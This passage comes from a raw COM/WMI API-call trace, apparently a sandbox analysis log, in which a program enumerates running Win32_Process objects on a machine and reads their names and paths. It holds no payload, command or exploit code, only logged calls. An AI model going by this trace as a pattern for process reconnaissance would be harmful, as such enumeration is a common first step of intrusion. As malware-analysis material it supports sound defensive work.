mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.885] IUnknown:Release (This=0x5520264) returned 0x3 [0264.885] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.885] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.885] IUnknown:QueryInterface (in: This=0x5520260, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.885] IUnknown:Release (This=0x5520260) returned 0x2 [0264.885] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.886] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.886] IUnknown:QueryInterface (in: This=0x5520260, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5520260) returned 0x0 [0264.886] IUnknown:AddRef (This=0x5520260) returned 0x4 [0264.886] IUnknown:Release (This=0x5520260) returned 0x3 [0264.886] IUnknown:Release (This=0x5520260) returned 0x2 [0264.886] CoTaskMemFree (pv=0x54ba2c8) [0264.886] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.886] IUnknown:AddRef (This=0x5520260) returned 0x3 [0264.886] IWbemClassObject:Get (in: This=0x5520260, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.886] IWbemClassObject:Get (in: This=0x5520260, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"780\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.886] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"780\"") returned 0x5c [0264.886] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"780\"") returned 0x5c [0264.887] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.887] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.887] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.887] IUnknown:Release (This=0x601a94) returned 0x1 [0264.891] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.891] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55148f8) returned 0x0 [0264.891] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55148f8) returned 0x0 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.891] WbemDefPath:IUnknown:AddRef (This=0x55148f8) returned 0x3 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551d130) returned 0x0 [0264.892] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551d130, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.892] WbemDefPath:IUnknown:Release (This=0x551d130) returned 0x3 [0264.892] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.892] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.892] WbemDefPath:IUnknown:Release (This=0x55148f8) returned 0x2 [0264.892] WbemDefPath:IUnknown:Release (This=0x55148f8) returned 0x1 [0264.892] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.892] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x55148f8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55148f8) returned 0x0 [0264.892] WbemDefPath:IUnknown:AddRef (This=0x55148f8) returned 0x3 [0264.892] WbemDefPath:IUnknown:Release (This=0x55148f8) returned 0x2 [0264.892] WbemDefPath:IWbemPath:SetText (This=0x55148f8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"780\"") returned 0x0 [0264.892] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.892] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.892] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.892] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.892] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.892] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.892] IWbemClassObject:Get (in: This=0x5520260, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d234c*=0, plFlavor=0x23d2350*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="watch reveal.exe", varVal2=0x0), pType=0x23d234c*=8, plFlavor=0x23d2350*=0) returned 0x0 [0264.893] SysStringByteLen (bstr="watch reveal.exe") returned 0x20 [0264.893] SysStringByteLen (bstr="watch reveal.exe") returned 0x20 [0264.893] IWbemClassObject:Get (in: This=0x5520260, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d234c*=8, plFlavor=0x23d2350*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="watch reveal.exe", varVal2=0x0), pType=0x23d234c*=8, plFlavor=0x23d2350*=0) returned 0x0 [0264.893] SysStringByteLen (bstr="watch reveal.exe") returned 0x20 [0264.893] SysStringByteLen (bstr="watch reveal.exe") returned 0x20 [0264.893] CoTaskMemAlloc (cb=0x4) returned 0x54ba248 [0264.893] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba248, puReturned=0x23c1fd0 | out: apObjects=0x54ba248*=0x5520590, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.894] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5520590) returned 0x0 [0264.895] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.895] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.895] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.896] IUnknown:AddRef (This=0x5520590) returned 0x3 [0264.896] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.896] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.896] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5520594) returned 0x0 [0264.896] IMarshal:GetUnmarshalClass (in: This=0x5520594, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.896] IUnknown:Release (This=0x5520594) returned 0x3 [0264.896] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.896] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.896] IUnknown:QueryInterface (in: This=0x5520590, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.896] IUnknown:Release (This=0x5520590) returned 0x2 [0264.896] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.896] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.897] IUnknown:QueryInterface (in: This=0x5520590, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5520590) returned 0x0 [0264.897] IUnknown:AddRef (This=0x5520590) returned 0x4 [0264.897] IUnknown:Release (This=0x5520590) returned 0x3 [0264.897] IUnknown:Release (This=0x5520590) returned 0x2 [0264.897] CoTaskMemFree (pv=0x54ba248) [0264.897] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.897] IUnknown:AddRef (This=0x5520590) returned 0x3 [0264.897] IWbemClassObject:Get (in: This=0x5520590, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.897] IWbemClassObject:Get (in: This=0x5520590, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3156\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.897] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3156\"") returned 0x5e [0264.897] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3156\"") returned 0x5e [0264.897] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.898] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.898] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.898] IUnknown:Release (This=0x601a94) returned 0x1 [0264.898] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2e8) returned 0x0 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2e8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.899] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2e8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55149d8) returned 0x0 [0264.899] WbemDefPath:IUnknown:Release (This=0x54ba2e8) returned 0x0 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55149d8) returned 0x0 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.899] WbemDefPath:IUnknown:AddRef (This=0x55149d8) returned 0x3 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x551d220) returned 0x0 [0264.899] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x551d220, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.899] WbemDefPath:IUnknown:Release (This=0x551d220) returned 0x3 [0264.899] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.899] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.900] WbemDefPath:IUnknown:Release (This=0x55149d8) returned 0x2 [0264.900] WbemDefPath:IUnknown:Release (This=0x55149d8) returned 0x1 [0264.900] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.900] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.900] WbemDefPath:IUnknown:QueryInterface (in: This=0x55149d8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55149d8) returned 0x0 [0264.900] WbemDefPath:IUnknown:AddRef (This=0x55149d8) returned 0x3 [0264.900] WbemDefPath:IUnknown:Release (This=0x55149d8) returned 0x2 [0264.900] WbemDefPath:IWbemPath:SetText (This=0x55149d8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3156\"") returned 0x0 [0264.900] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.900] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.900] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.900] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.900] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.900] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.900] IWbemClassObject:Get (in: This=0x5520590, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d2bf0*=0, plFlavor=0x23d2bf4*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="restratedegree.exe", varVal2=0x0), pType=0x23d2bf0*=8, plFlavor=0x23d2bf4*=0) returned 0x0 [0264.900] SysStringByteLen (bstr="restratedegree.exe") returned 0x24 [0264.900] SysStringByteLen (bstr="restratedegree.exe") returned 0x24 [0264.900] IWbemClassObject:Get (in: This=0x5520590, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d2bf0*=8, plFlavor=0x23d2bf4*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="restratedegree.exe", varVal2=0x0), pType=0x23d2bf0*=8, plFlavor=0x23d2bf4*=0) returned 0x0 [0264.900] SysStringByteLen (bstr="restratedegree.exe") returned 0x24 [0264.901] SysStringByteLen (bstr="restratedegree.exe") returned 0x24 [0264.901] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0264.901] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x55200c8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.901] IUnknown:QueryInterface (in: This=0x55200c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x55200c8) returned 0x0 [0264.902] 